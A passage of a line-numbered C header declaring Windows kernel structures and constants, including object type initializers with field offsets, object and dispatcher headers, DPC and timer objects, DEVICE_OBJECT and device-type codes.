NonPagedPoolCacheAlignedMustS = 6, 2369 | MaxPoolType = 7, 2370 | NonPagedPoolBase = 0, 2371 | NonPagedPoolBaseMustSucceed = 2, 2372 | NonPagedPoolBaseCacheAligned = 4, 2373 | NonPagedPoolBaseCacheAlignedMustS = 6, 2374 | NonPagedPoolSession = 32, 2375 | PagedPoolSession = 33, 2376 | NonPagedPoolMustSucceedSession = 34, 2377 | DontUseThisTypeSession = 35, 2378 | NonPagedPoolCacheAlignedSession = 36, 2379 | PagedPoolCacheAlignedSession = 37, 2380 | NonPagedPoolCacheAlignedMustSSession = 38, 2381 | NonPagedPoolNx = 512, 2382 | NonPagedPoolNxCacheAligned = 516, 2383 | NonPagedPoolSessionNx = 544 2384 | } POOL_TYPE; 2385 | 2386 | typedef struct _OBJECT_TYPE_INITIALIZER_V1 { 2387 | USHORT Length; 2388 | BOOLEAN UseDefaultObject; 2389 | BOOLEAN Reserved1; 2390 | ULONG InvalidAttributes; 2391 | GENERIC_MAPPING GenericMapping; 2392 | ACCESS_MASK ValidAccessMask; 2393 | BOOLEAN SecurityRequired; 2394 | BOOLEAN MaintainHandleCount; 2395 | BOOLEAN MaintainTypeList; 2396 | UCHAR Reserved2; 2397 | BOOLEAN PagedPool; 2398 | ULONG DefaultPagedPoolCharge; 2399 | ULONG DefaultNonPagedPoolCharge; 2400 | PVOID DumpProcedure; 2401 | PVOID OpenProcedure; 2402 | PVOID CloseProcedure; 2403 | PVOID DeleteProcedure; 2404 | PVOID ParseProcedure; 2405 | PVOID SecurityProcedure; 2406 | PVOID QueryNameProcedure; 2407 | PVOID OkayToCloseProcedure; 2408 | } OBJECT_TYPE_INITIALIZER_V1, *POBJECT_TYPE_INITIALIZER_V1; 2409 | 2410 | typedef struct _OBJECT_TYPE_INITIALIZER_V2 {// Size=120 2411 | USHORT Length; // Size=2 Offset=0 2412 | UCHAR ObjectTypeFlags; // Size=1 Offset=2 2413 | ULONG ObjectTypeCode; // Size=4 Offset=4 2414 | ULONG InvalidAttributes; // Size=4 Offset=8 2415 | GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 2416 | ULONG ValidAccessMask; // Size=4 Offset=28 2417 | ULONG RetainAccess; // Size=4 Offset=32 2418 | POOL_TYPE PoolType; // Size=4 Offset=36 2419 | ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 2420 | ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 2421 | PVOID DumpProcedure; // Size=8 Offset=48 2422 | PVOID OpenProcedure; // Size=8 Offset=56 2423 | PVOID CloseProcedure; // Size=8 Offset=64 2424 | PVOID DeleteProcedure; // Size=8 Offset=72 2425 | PVOID ParseProcedure; // Size=8 Offset=80 2426 | PVOID SecurityProcedure; // Size=8 Offset=88 2427 | PVOID QueryNameProcedure; // Size=8 Offset=96 2428 | PVOID OkayToCloseProcedure; // Size=8 Offset=104 2429 | } OBJECT_TYPE_INITIALIZER_V2, *POBJECT_TYPE_INITIALIZER_V2; 2430 | 2431 | typedef struct _OBJECT_TYPE_INITIALIZER_V3 {// Size=120 2432 | USHORT Length; // Size=2 Offset=0 2433 | UCHAR ObjectTypeFlags; // Size=1 Offset=2 2434 | ULONG ObjectTypeCode; // Size=4 Offset=4 2435 | ULONG InvalidAttributes; // Size=4 Offset=8 2436 | GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 2437 | ULONG ValidAccessMask; // Size=4 Offset=28 2438 | ULONG RetainAccess; // Size=4 Offset=32 2439 | POOL_TYPE PoolType; // Size=4 Offset=36 2440 | ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 2441 | ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 2442 | PVOID DumpProcedure; // Size=8 Offset=48 2443 | PVOID OpenProcedure; // Size=8 Offset=56 2444 | PVOID CloseProcedure; // Size=8 Offset=64 2445 | PVOID DeleteProcedure; // Size=8 Offset=72 2446 | PVOID ParseProcedure; // Size=8 Offset=80 2447 | PVOID SecurityProcedure; // Size=8 Offset=88 2448 | PVOID QueryNameProcedure; // Size=8 Offset=96 2449 | PVOID OkayToCloseProcedure; // Size=8 Offset=104 2450 | ULONG WaitObjectFlagMask; // Size=4 Offset=112 2451 | USHORT WaitObjectFlagOffset; // Size=2 Offset=116 2452 | USHORT WaitObjectPointerOffset; // Size=2 Offset=118 2453 | } OBJECT_TYPE_INITIALIZER_V3, *POBJECT_TYPE_INITIALIZER_V3; 2454 | 2455 | typedef struct _OBJECT_TYPE_INITIALIZER {// Size=120 2456 | USHORT Length; // Size=2 Offset=0 2457 | UCHAR ObjectTypeFlags; // Size=1 Offset=2 2458 | ULONG ObjectTypeCode; // Size=4 Offset=4 2459 | ULONG InvalidAttributes; // Size=4 Offset=8 2460 | GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 2461 | ULONG ValidAccessMask; // Size=4 Offset=28 2462 | ULONG RetainAccess; // Size=4 Offset=32 2463 | POOL_TYPE PoolType; // Size=4 Offset=36 2464 | ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 2465 | ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 2466 | PVOID DumpProcedure; // Size=8 Offset=48 2467 | PVOID OpenProcedure; // Size=8 Offset=56 2468 | PVOID CloseProcedure; // Size=8 Offset=64 2469 | PVOID DeleteProcedure; // Size=8 Offset=72 2470 | PVOID ParseProcedure; // Size=8 Offset=80 2471 | PVOID SecurityProcedure; // Size=8 Offset=88 2472 | PVOID QueryNameProcedure; // Size=8 Offset=96 2473 | PVOID OkayToCloseProcedure; // Size=8 Offset=104 2474 | } OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER; 2475 | 2476 | typedef struct _OBJECT_TYPE_V2 {// Size=216 2477 | LIST_ENTRY TypeList; // Size=16 Offset=0 2478 | UNICODE_STRING Name; // Size=16 Offset=16 2479 | PVOID DefaultObject; // Size=8 Offset=32 2480 | UCHAR Index; // Size=1 Offset=40 2481 | ULONG TotalNumberOfObjects; // Size=4 Offset=44 2482 | ULONG TotalNumberOfHandles; // Size=4 Offset=48 2483 | ULONG HighWaterNumberOfObjects; // Size=4 Offset=52 2484 | ULONG HighWaterNumberOfHandles; // Size=4 Offset=56 2485 | OBJECT_TYPE_INITIALIZER_V2 TypeInfo; 2486 | EX_PUSH_LOCK TypeLock; 2487 | ULONG Key; 2488 | LIST_ENTRY CallbackList; 2489 | } OBJECT_TYPE_V2, *POBJECT_TYPE_V2; 2490 | 2491 | typedef struct _OBJECT_TYPE_V3 {// Size=216 2492 | LIST_ENTRY TypeList; // Size=16 Offset=0 2493 | UNICODE_STRING Name; // Size=16 Offset=16 2494 | PVOID DefaultObject; // Size=8 Offset=32 2495 | UCHAR Index; // Size=1 Offset=40 2496 | ULONG TotalNumberOfObjects; // Size=4 Offset=44 2497 | ULONG TotalNumberOfHandles; // Size=4 Offset=48 2498 | ULONG HighWaterNumberOfObjects; // Size=4 Offset=52 2499 | ULONG HighWaterNumberOfHandles; // Size=4 Offset=56 2500 | OBJECT_TYPE_INITIALIZER_V3 TypeInfo; 2501 | EX_PUSH_LOCK TypeLock; 2502 | ULONG Key; 2503 | LIST_ENTRY CallbackList; 2504 | } OBJECT_TYPE_V3, *POBJECT_TYPE_V3; 2505 | 2506 | typedef struct _OBJECT_TYPE_COMPATIBLE { 2507 | LIST_ENTRY TypeList; 2508 | UNICODE_STRING Name; 2509 | PVOID DefaultObject; 2510 | UCHAR Index; 2511 | ULONG TotalNumberOfObjects; 2512 | ULONG TotalNumberOfHandles; 2513 | ULONG HighWaterNumberOfObjects; 2514 | ULONG HighWaterNumberOfHandles; 2515 | OBJECT_TYPE_INITIALIZER_V2 TypeInfo; 2516 | } OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE; 2517 | 2518 | /* 2519 | ** brand new header starting from 6.1 2520 | */ 2521 | 2522 | typedef struct _OBJECT_HEADER { 2523 | LONG PointerCount; 2524 | union 2525 | { 2526 | LONG HandleCount; 2527 | PVOID NextToFree; 2528 | }; 2529 | EX_PUSH_LOCK Lock; 2530 | UCHAR TypeIndex; 2531 | UCHAR TraceFlags; 2532 | UCHAR InfoMask; 2533 | UCHAR Flags; 2534 | union 2535 | { 2536 | POBJECT_CREATE_INFORMATION ObjectCreateInfo; 2537 | PVOID QuotaBlockCharged; 2538 | }; 2539 | PVOID SecurityDescriptor; 2540 | QUAD Body; 2541 | } OBJECT_HEADER, *POBJECT_HEADER; 2542 | 2543 | #define OBJECT_TO_OBJECT_HEADER(obj) \ 2544 | CONTAINING_RECORD( (obj), OBJECT_HEADER, Body ) 2545 | 2546 | /* 2547 | ** OBJECT MANAGER END 2548 | */ 2549 | 2550 | /* 2551 | * WDM START 2552 | */ 2553 | #define TIMER_TOLERABLE_DELAY_BITS 6 2554 | #define TIMER_EXPIRED_INDEX_BITS 6 2555 | #define TIMER_PROCESSOR_INDEX_BITS 5 2556 | 2557 | typedef struct _DISPATCHER_HEADER { 2558 | union { 2559 | union { 2560 | volatile LONG Lock; 2561 | LONG LockNV; 2562 | } DUMMYUNIONNAME; 2563 | 2564 | struct { // Events, Semaphores, Gates, etc. 2565 | UCHAR Type; // All (accessible via KOBJECT_TYPE) 2566 | UCHAR Signalling; 2567 | UCHAR Size; 2568 | UCHAR Reserved1; 2569 | } DUMMYSTRUCTNAME; 2570 | 2571 | struct { // Timer 2572 | UCHAR TimerType; 2573 | union { 2574 | UCHAR TimerControlFlags; 2575 | struct { 2576 | UCHAR Absolute : 1; 2577 | UCHAR Wake : 1; 2578 | UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS; 2579 | } DUMMYSTRUCTNAME; 2580 | }; 2581 | 2582 | UCHAR Hand; 2583 | union { 2584 | UCHAR TimerMiscFlags; 2585 | struct { 2586 | 2587 | #if !defined(KENCODED_TIMER_PROCESSOR) 2588 | 2589 | UCHAR Index : TIMER_EXPIRED_INDEX_BITS; 2590 | 2591 | #else 2592 | 2593 | UCHAR Index : 1; 2594 | UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS; 2595 | 2596 | #endif 2597 | 2598 | UCHAR Inserted : 1; 2599 | volatile UCHAR Expired : 1; 2600 | } DUMMYSTRUCTNAME; 2601 | } DUMMYUNIONNAME; 2602 | } DUMMYSTRUCTNAME2; 2603 | 2604 | struct { // Timer2 2605 | UCHAR Timer2Type; 2606 | union { 2607 | UCHAR Timer2Flags; 2608 | struct { 2609 | UCHAR Timer2Inserted : 1; 2610 | UCHAR Timer2Expiring : 1; 2611 | UCHAR Timer2CancelPending : 1; 2612 | UCHAR Timer2SetPending : 1; 2613 | UCHAR Timer2Running : 1; 2614 | UCHAR Timer2Disabled : 1; 2615 | UCHAR Timer2ReservedFlags : 2; 2616 | } DUMMYSTRUCTNAME; 2617 | } DUMMYUNIONNAME; 2618 | 2619 | UCHAR Timer2Reserved1; 2620 | UCHAR Timer2Reserved2; 2621 | } DUMMYSTRUCTNAME3; 2622 | 2623 | struct { // Queue 2624 | UCHAR QueueType; 2625 | union { 2626 | UCHAR QueueControlFlags; 2627 | struct { 2628 | UCHAR Abandoned : 1; 2629 | UCHAR DisableIncrement : 1; 2630 | UCHAR QueueReservedControlFlags : 6; 2631 | } DUMMYSTRUCTNAME; 2632 | } DUMMYUNIONNAME; 2633 | 2634 | UCHAR QueueSize; 2635 | UCHAR QueueReserved; 2636 | } DUMMYSTRUCTNAME4; 2637 | 2638 | struct { // Thread 2639 | UCHAR ThreadType; 2640 | UCHAR ThreadReserved; 2641 | union { 2642 | UCHAR ThreadControlFlags; 2643 | struct { 2644 | UCHAR CycleProfiling : 1; 2645 | UCHAR CounterProfiling : 1; 2646 | UCHAR GroupScheduling : 1; 2647 | UCHAR AffinitySet : 1; 2648 | UCHAR ThreadReservedControlFlags : 4; 2649 | } DUMMYSTRUCTNAME; 2650 | } DUMMYUNIONNAME; 2651 | 2652 | union { 2653 | UCHAR DebugActive; 2654 | 2655 | #if !defined(_X86_) 2656 | 2657 | struct { 2658 | BOOLEAN ActiveDR7 : 1; 2659 | BOOLEAN Instrumented : 1; 2660 | BOOLEAN Minimal : 1; 2661 | BOOLEAN Reserved4 : 3; 2662 | BOOLEAN UmsScheduled : 1; 2663 | BOOLEAN UmsPrimary : 1; 2664 | } DUMMYSTRUCTNAME; 2665 | 2666 | #endif 2667 | 2668 | } DUMMYUNIONNAME2; 2669 | } DUMMYSTRUCTNAME5; 2670 | 2671 | struct { // Mutant 2672 | UCHAR MutantType; 2673 | UCHAR MutantSize; 2674 | BOOLEAN DpcActive; 2675 | UCHAR MutantReserved; 2676 | } DUMMYSTRUCTNAME6; 2677 | } DUMMYUNIONNAME; 2678 | 2679 | LONG SignalState; // Object lock 2680 | LIST_ENTRY WaitListHead; // Object lock 2681 | } DISPATCHER_HEADER, *PDISPATCHER_HEADER; 2682 | 2683 | typedef struct _KEVENT { 2684 | DISPATCHER_HEADER Header; 2685 | } KEVENT, *PKEVENT, *PRKEVENT; 2686 | 2687 | typedef struct _KMUTANT { 2688 | DISPATCHER_HEADER Header; 2689 | LIST_ENTRY MutantListEntry; 2690 | struct _KTHREAD *OwnerThread; 2691 | BOOLEAN Abandoned; 2692 | UCHAR ApcDisable; 2693 | } KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX; 2694 | 2695 | typedef struct _KSEMAPHORE { 2696 | DISPATCHER_HEADER Header; 2697 | LONG Limit; 2698 | } KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE; 2699 | 2700 | typedef struct _KTIMER { 2701 | DISPATCHER_HEADER Header; 2702 | ULARGE_INTEGER DueTime; 2703 | LIST_ENTRY TimerListEntry; 2704 | struct _KDPC *Dpc; 2705 | ULONG Processor; 2706 | LONG Period; 2707 | } KTIMER, *PKTIMER, *PRKTIMER; 2708 | 2709 | typedef struct _KDEVICE_QUEUE_ENTRY { 2710 | LIST_ENTRY DeviceListEntry; 2711 | ULONG SortKey; 2712 | BOOLEAN Inserted; 2713 | } KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY; 2714 | 2715 | typedef enum _KDPC_IMPORTANCE { 2716 | LowImportance, 2717 | MediumImportance, 2718 | HighImportance 2719 | } KDPC_IMPORTANCE; 2720 | 2721 | typedef struct _KDPC { 2722 | union { 2723 | ULONG TargetInfoAsUlong; 2724 | struct { 2725 | UCHAR Type; 2726 | UCHAR Importance; 2727 | volatile USHORT Number; 2728 | } DUMMYSTRUCTNAME; 2729 | } DUMMYUNIONNAME; 2730 | 2731 | SINGLE_LIST_ENTRY DpcListEntry; 2732 | KAFFINITY ProcessorHistory; 2733 | PVOID DeferredRoutine; 2734 | PVOID DeferredContext; 2735 | PVOID SystemArgument1; 2736 | PVOID SystemArgument2; 2737 | __volatile PVOID DpcData; 2738 | } KDPC, *PKDPC, *PRKDPC; 2739 | 2740 | typedef struct _WAIT_CONTEXT_BLOCK { 2741 | union { 2742 | KDEVICE_QUEUE_ENTRY WaitQueueEntry; 2743 | struct { 2744 | LIST_ENTRY DmaWaitEntry; 2745 | ULONG NumberOfChannels; 2746 | ULONG SyncCallback : 1; 2747 | ULONG DmaContext : 1; 2748 | ULONG Reserved : 30; 2749 | }; 2750 | }; 2751 | PVOID DeviceRoutine; 2752 | PVOID DeviceContext; 2753 | ULONG NumberOfMapRegisters; 2754 | PVOID DeviceObject; 2755 | PVOID CurrentIrp; 2756 | PKDPC BufferChainingDpc; 2757 | } WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK; 2758 | 2759 | #define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters 2760 | 2761 | typedef struct _VPB { 2762 | CSHORT Type; 2763 | CSHORT Size; 2764 | USHORT Flags; 2765 | USHORT VolumeLabelLength; // in bytes 2766 | struct _DEVICE_OBJECT *DeviceObject; 2767 | struct _DEVICE_OBJECT *RealDevice; 2768 | ULONG SerialNumber; 2769 | ULONG ReferenceCount; 2770 | WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)]; 2771 | } VPB, *PVPB; 2772 | 2773 | typedef struct _KQUEUE { 2774 | DISPATCHER_HEADER Header; 2775 | LIST_ENTRY EntryListHead; 2776 | ULONG CurrentCount; 2777 | ULONG MaximumCount; 2778 | LIST_ENTRY ThreadListHead; 2779 | } KQUEUE, *PKQUEUE; 2780 | 2781 | typedef struct _KDEVICE_QUEUE { 2782 | CSHORT Type; 2783 | CSHORT Size; 2784 | LIST_ENTRY DeviceListHead; 2785 | KSPIN_LOCK Lock; 2786 | 2787 | #if defined(_AMD64_) 2788 | 2789 | union { 2790 | BOOLEAN Busy; 2791 | struct { 2792 | LONG64 Reserved : 8; 2793 | LONG64 Hint : 56; 2794 | }; 2795 | }; 2796 | 2797 | #else 2798 | 2799 | BOOLEAN Busy; 2800 | 2801 | #endif 2802 | 2803 | } KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE; 2804 | 2805 | enum _KOBJECTS { 2806 | EventNotificationObject = 0x0, 2807 | EventSynchronizationObject = 0x1, 2808 | MutantObject = 0x2, 2809 | ProcessObject = 0x3, 2810 | QueueObject = 0x4, 2811 | SemaphoreObject = 0x5, 2812 | ThreadObject = 0x6, 2813 | GateObject = 0x7, 2814 | TimerNotificationObject = 0x8, 2815 | TimerSynchronizationObject = 0x9, 2816 | Spare2Object = 0xa, 2817 | Spare3Object = 0xb, 2818 | Spare4Object = 0xc, 2819 | Spare5Object = 0xd, 2820 | Spare6Object = 0xe, 2821 | Spare7Object = 0xf, 2822 | Spare8Object = 0x10, 2823 | Spare9Object = 0x11, 2824 | ApcObject = 0x12, 2825 | DpcObject = 0x13, 2826 | DeviceQueueObject = 0x14, 2827 | EventPairObject = 0x15, 2828 | InterruptObject = 0x16, 2829 | ProfileObject = 0x17, 2830 | ThreadedDpcObject = 0x18, 2831 | MaximumKernelObject = 0x19, 2832 | }; 2833 | 2834 | #define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm 2835 | #define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm 2836 | #define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm 2837 | #define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm 2838 | #define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm 2839 | #define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs 2840 | #define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm 2841 | #define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs 2842 | #define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs 2843 | #define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs 2844 | #define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm 2845 | #define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm 2846 | #define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm 2847 | #define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm 2848 | #define DO_POWER_NOOP 0x00008000 2849 | #define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs 2850 | #define DO_XIP 0x00020000 2851 | 2852 | #define FILE_REMOVABLE_MEDIA 0x00000001 2853 | #define FILE_READ_ONLY_DEVICE 0x00000002 2854 | #define FILE_FLOPPY_DISKETTE 0x00000004 2855 | #define FILE_WRITE_ONCE_MEDIA 0x00000008 2856 | #define FILE_REMOTE_DEVICE 0x00000010 2857 | #define FILE_DEVICE_IS_MOUNTED 0x00000020 2858 | #define FILE_VIRTUAL_VOLUME 0x00000040 2859 | #define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080 2860 | #define FILE_DEVICE_SECURE_OPEN 0x00000100 2861 | #define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800 2862 | #define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000 2863 | #define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000 2864 | #define FILE_CHARACTERISTIC_CSV 0x00010000 2865 | #define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000 2866 | #define FILE_PORTABLE_DEVICE 0x00040000 2867 | 2868 | #define FILE_DEVICE_BEEP 0x00000001 2869 | #define FILE_DEVICE_CD_ROM 0x00000002 2870 | #define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003 2871 | #define FILE_DEVICE_CONTROLLER 0x00000004 2872 | #define FILE_DEVICE_DATALINK 0x00000005 2873 | #define FILE_DEVICE_DFS 0x00000006 2874 | #define FILE_DEVICE_DISK 0x00000007 2875 | #define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008 2876 | #define FILE_DEVICE_FILE_SYSTEM 0x00000009 2877 | #define FILE_DEVICE_INPORT_PORT 0x0000000a 2878 | #define FILE_DEVICE_KEYBOARD 0x0000000b 2879 | #define FILE_DEVICE_MAILSLOT 0x0000000c 2880 | #define FILE_DEVICE_MIDI_IN 0x0000000d 2881 | #define FILE_DEVICE_MIDI_OUT 0x0000000e 2882 | #define FILE_DEVICE_MOUSE 0x0000000f 2883 | #define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010 2884 | #define FILE_DEVICE_NAMED_PIPE 0x00000011 2885 | #define FILE_DEVICE_NETWORK 0x00000012 2886 | #define FILE_DEVICE_NETWORK_BROWSER 0x00000013 2887 | #define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014 2888 | #define FILE_DEVICE_NULL 0x00000015 2889 | #define FILE_DEVICE_PARALLEL_PORT 0x00000016 2890 | #define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017 2891 | #define FILE_DEVICE_PRINTER 0x00000018 2892 | #define FILE_DEVICE_SCANNER 0x00000019 2893 | #define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a 2894 | #define FILE_DEVICE_SERIAL_PORT 0x0000001b 2895 | #define FILE_DEVICE_SCREEN 0x0000001c 2896 | #define FILE_DEVICE_SOUND 0x0000001d 2897 | #define FILE_DEVICE_STREAMS 0x0000001e 2898 | #define FILE_DEVICE_TAPE 0x0000001f 2899 | #define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020 2900 | #define FILE_DEVICE_TRANSPORT 0x00000021 2901 | #define FILE_DEVICE_UNKNOWN 0x00000022 2902 | #define FILE_DEVICE_VIDEO 0x00000023 2903 | #define FILE_DEVICE_VIRTUAL_DISK 0x00000024 2904 | #define FILE_DEVICE_WAVE_IN 0x00000025 2905 | #define FILE_DEVICE_WAVE_OUT 0x00000026 2906 | #define FILE_DEVICE_8042_PORT 0x00000027 2907 | #define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028 2908 | #define FILE_DEVICE_BATTERY 0x00000029 2909 | #define FILE_DEVICE_BUS_EXTENDER 0x0000002a 2910 | #define FILE_DEVICE_MODEM 0x0000002b 2911 | #define FILE_DEVICE_VDM 0x0000002c 2912 | #define FILE_DEVICE_MASS_STORAGE 0x0000002d 2913 | #define FILE_DEVICE_SMB 0x0000002e 2914 | #define FILE_DEVICE_KS 0x0000002f 2915 | #define FILE_DEVICE_CHANGER 0x00000030 2916 | #define FILE_DEVICE_SMARTCARD 0x00000031 2917 | #define FILE_DEVICE_ACPI 0x00000032 2918 | #define FILE_DEVICE_DVD 0x00000033 2919 | #define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034 2920 | #define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035 2921 | #define FILE_DEVICE_DFS_VOLUME 0x00000036 2922 | #define FILE_DEVICE_SERENUM 0x00000037 2923 | #define FILE_DEVICE_TERMSRV 0x00000038 2924 | #define FILE_DEVICE_KSEC 0x00000039 2925 | #define FILE_DEVICE_FIPS 0x0000003A 2926 | #define FILE_DEVICE_INFINIBAND 0x0000003B 2927 | #define FILE_DEVICE_VMBUS 0x0000003E 2928 | #define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F 2929 | #define FILE_DEVICE_WPD 0x00000040 2930 | #define FILE_DEVICE_BLUETOOTH 0x00000041 2931 | #define FILE_DEVICE_MT_COMPOSITE 0x00000042 2932 | #define FILE_DEVICE_MT_TRANSPORT 0x00000043 2933 | #define FILE_DEVICE_BIOMETRIC 0x00000044 2934 | #define FILE_DEVICE_PMI 0x00000045 2935 | #define FILE_DEVICE_EHSTOR 0x00000046 2936 | #define FILE_DEVICE_DEVAPI 0x00000047 2937 | #define FILE_DEVICE_GPIO 0x00000048 2938 | #define FILE_DEVICE_USBEX 0x00000049 2939 | #define FILE_DEVICE_CONSOLE 0x00000050 2940 | #define FILE_DEVICE_NFP 0x00000051 2941 | #define FILE_DEVICE_SYSENV 0x00000052 2942 | #define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053 2943 | #define FILE_DEVICE_POINT_OF_SERVICE 0x00000054 2944 | 2945 | #define FILE_BYTE_ALIGNMENT 0x00000000 2946 | #define FILE_WORD_ALIGNMENT 0x00000001 2947 | #define FILE_LONG_ALIGNMENT 0x00000003 2948 | #define FILE_QUAD_ALIGNMENT 0x00000007 2949 | #define FILE_OCTA_ALIGNMENT 0x0000000f 2950 | #define FILE_32_BYTE_ALIGNMENT 0x0000001f 2951 | #define FILE_64_BYTE_ALIGNMENT 0x0000003f 2952 | #define FILE_128_BYTE_ALIGNMENT 0x0000007f 2953 | #define FILE_256_BYTE_ALIGNMENT 0x000000ff 2954 | #define FILE_512_BYTE_ALIGNMENT 0x000001ff 2955 | 2956 | #define DPC_NORMAL 0 2957 | #define DPC_THREADED 1 2958 | 2959 | typedef struct _DEVICE_OBJECT { 2960 | CSHORT Type; 2961 | USHORT Size; 2962 | LONG ReferenceCount; 2963 | struct _DRIVER_OBJECT *DriverObject; 2964 | struct _DEVICE_OBJECT *NextDevice; 2965 | struct _DEVICE_OBJECT *AttachedDevice; 2966 | struct _IRP *CurrentIrp; 2967 | PVOID Timer; 2968 | ULONG Flags; 2969 | ULONG Characteristics; 2970 | __volatile PVPB Vpb; 2971 | PVOID DeviceExtension; 2972 | DEVICE_TYPE DeviceType; 2973 | CCHAR StackSize; 2974 | union { 2975 | LIST_ENTRY ListEntry; 2976 | WAIT_CONTEXT_BLOCK Wcb; 2977 | } Queue; 2978 | ULONG AlignmentRequirement; 2979 | KDEVICE_QUEUE DeviceQueue; 2980 | KDPC Dpc; 2981 | ULONG ActiveThreadCount; 2982 | PSECURITY_DESCRIPTOR SecurityDescriptor; 2983 | KEVENT DeviceLock; 2984 | USHORT SectorSize; 2985 | USHORT Spare1; 2986 | struct _DEVOBJ_EXTENSION * DeviceObjectExtension; 2987 | PVOID Reserved; 2988 | } DEVICE_OBJECT, *PDEVICE_OBJECT; 2989 | 2990 | typedef struct _DEVOBJ_EXTENSION { 2991 | 2992 | CSHORT Type; 2993 | USHORT Size; 2994 | 2995 | // 2996 | // Public part of the DeviceObjectExtension structure 2997 | // 2998 | 2999 | PDEVICE_OBJECT DeviceObject; // owning device object 3000 | 3001 | // end_ntddk end_nthal end_ntifs end_wdm end_ntosp 3002 | 3003 | // 3004 | // Universal Power Data - all device objects must have this 3005 | // 3006 | 3007 | ULONG PowerFlags; // see ntos\po\pop.h 3008 | // WARNING: Access via PO macros 3009 | // and with PO locking rules ONLY. 3010 | 3011 | // 3012 | // Pointer to the non-universal power data 3013 | // Power data that only some device objects need is stored in the 3014 | // device object power extension -> DOPE 3015 | // see po.h 3016 | // 3017 | 3018 | struct _DEVICE_OBJECT_POWER_EXTENSION *Dope; 3019 | 3020 | // 3021 | // power state information 3022 | // 3023 | 3024 | // 3025 | // Device object extension flags. Protected by the IopDatabaseLock. 3026 | // 3027 | 3028 | ULONG ExtensionFlags; 3029 | 3030 | // 3031 | // PnP manager fields 3032 | // 3033 | 3034 | PVOID DeviceNode; 3035 | 3036 | // 3037 | // AttachedTo is a pointer to the device object that this device 3038 | // object is attached to. The attachment chain is now doubly 3039 | // linked: this pointer and DeviceObject->AttachedDevice provide the 3040 | // linkage. 3041 | // 3042 | 3043 | PDEVICE_OBJECT AttachedTo; 3044 | 3045 | // 3046 | // The next two fields are used to prevent recursion in IoStartNextPacket 3047 | // interfaces. 3048 | // 3049 | 3050 | LONG StartIoCount; // Used to keep track of number of pending start ios. 3051 | LONG StartIoKey; // Next startio key 3052 | ULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks 3053 | PVPB Vpb; // If not NULL contains the VPB of the mounted volume. 3054 | // Set in the filesystem's volume device object. 3055 | // This is a reverse VPB pointer. 3056 | 3057 | // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp 3058 | 3059 | } DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION; 3060 | 3061 | typedef struct _FAST_IO_DISPATCH { 3062 | ULONG SizeOfFastIoDispatch; 3063 | PVOID FastIoCheckIfPossible; 3064 | PVOID FastIoRead; 3065 | PVOID FastIoWrite; 3066 | PVOID FastIoQueryBasicInfo; 3067 | PVOID FastIoQueryStandardInfo; 3068 | PVOID FastIoLock; 3069 | PVOID FastIoUnlockSingle; 3070 | PVOID FastIoUnlockAll; 3071 | PVOID FastIoUnlockAllByKey; 3072 | PVOID FastIoDeviceControl; 3073 | PVOID AcquireFileForNtCreateSection; 3074 | PVOID ReleaseFileForNtCreateSection; 3075 | PVOID FastIoDetachDevice; 3076 | PVOID FastIoQueryNetworkOpenInfo; 3077 | PVOID AcquireForModWrite; 3078 | PVOID MdlRead; 3079 | PVOID MdlReadComplete; 3080 